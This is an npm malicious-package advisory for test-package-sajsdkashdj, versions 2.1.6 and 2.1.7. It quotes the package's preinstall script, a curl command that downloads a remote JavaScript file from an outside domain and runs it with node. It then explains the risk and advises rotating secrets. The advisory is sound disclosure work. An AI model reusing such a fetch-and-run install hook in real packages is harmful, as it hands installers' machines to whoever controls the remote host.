VYPR

npm · Malicious package advisory

Malware

test-package-sajsdkashdj

MAL-2026-6266

Malicious code in test-package-sajsdkashdj (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87)
package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the package downloads JavaScript from poc.amanrawat.com and immediately executes it with node under the installer's privileges. The fetched content is unpinned, unhashed, served from a third-party non-publisher domain, and mutable — whoever controls poc.amanrawat.com can ship arbitrary code to every installer at any time. The package itself contains no functionality beyond this dropper. The package name (test-package-sajsdkashdj) and the fetch target (a path named hehe.js on a personal-looking domain) further indicate this is not a legitimate distribution mechanism.

Compromised versions (2)

  • 2.1.6
  • 2.1.7

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.